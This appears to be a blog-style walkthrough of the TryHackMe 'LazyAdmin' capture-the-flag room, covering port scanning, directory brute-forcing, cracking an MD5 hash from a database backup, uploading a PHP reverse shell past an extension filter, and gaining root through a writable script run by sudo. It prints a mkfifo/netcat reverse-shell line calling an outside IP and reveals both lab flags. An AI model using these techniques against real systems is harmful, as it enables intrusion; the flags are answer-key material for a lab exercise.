Tryhackme -LazyAdmin -writeup

4 min readMay 26, 2021

Tryhackme — LazyAdmin

Have some fun! There might be multiple ways to get user access.this is real !!

NMAP — Network mapping

#command — nmap -sT -vv -sC -sV 10.10.126.215

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
| 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here , 22(ssh) and 80(http) ports are open..

HTTP

we can able to conclude that there is an http service is running on the machine lets check that service and will start to enumerating it.

Enumeration

For enumeration we are going to do find the hidden directories of the webserver using our favorite tool called gobuster.

#Command — gobuster dir -u http://10.10.126.215 -w /usr/share/dirb/wordlists/common.txt -x txt,php

Here, we got hidden directory.. /content

again ..we will try gobuster and find some hidden directory…

#Command — gobuster dir -u http://10.10.126.215/content -w /usr/share/dirb/wordlists/common.txt -x txt,php

/images /inc /index.php
/index.php

After the gobuster scan we found some interesting folders and in that there is a really interesting folder called /inc lets check what it has.

here,DB related files lets check mysqlbackup folder here. It contains a MYSQL backup file lets download this and see whether it has have any interesting information ..

Here i found the credential for login:

and we found some md5 hash username is manager The password is a MD5 hash. So let’s use a md5 decrypt online and i found the password.

links here — https://crackstation.net/

try crackstation ..

let’s check hidden directory /as ..and login to the page.

We are in the admin page. Now let’s try to upload our shell.

Navigate to Media -> Upload. I’ve tried to upload the .php shell, but the web refused this extension. So change .php5 to .phtml and upload.

click to shell.php5. Now start a listener on our machine and now we’ve got our shell.

#nc -lvnp <port>

User Flag

# cd /home

#ls

itguy

#cd itguy

#ls

#cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}

Now let’s try to get root. We’re gonna spawn a tty using this python script:

#python -c ‘import pty;pty.spawn(“/bin/bash”)’

privilege Escalation

then sudo -l to check which command we can use as root.

www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Well we can run Perl and the file backup.pl without password. Let’s check content of backup.pl

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system(“sh”, “/etc/copy.sh”);
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

we don’t try to any reverse shell here ! just command and execute .

root Flag

let’s check here — https://guif.re/linuxeop

www-data@THM-Chal:/home/itguy$ cd /etc
cd /etc
www-data@THM-Chal:/etc$ echo ‘exec “/bin/sh”’ > copy.sh
echo ‘exec “/bin/sh”’ > copy.sh
www-data@THM-Chal:/etc$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
# whoami
whoami
root
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}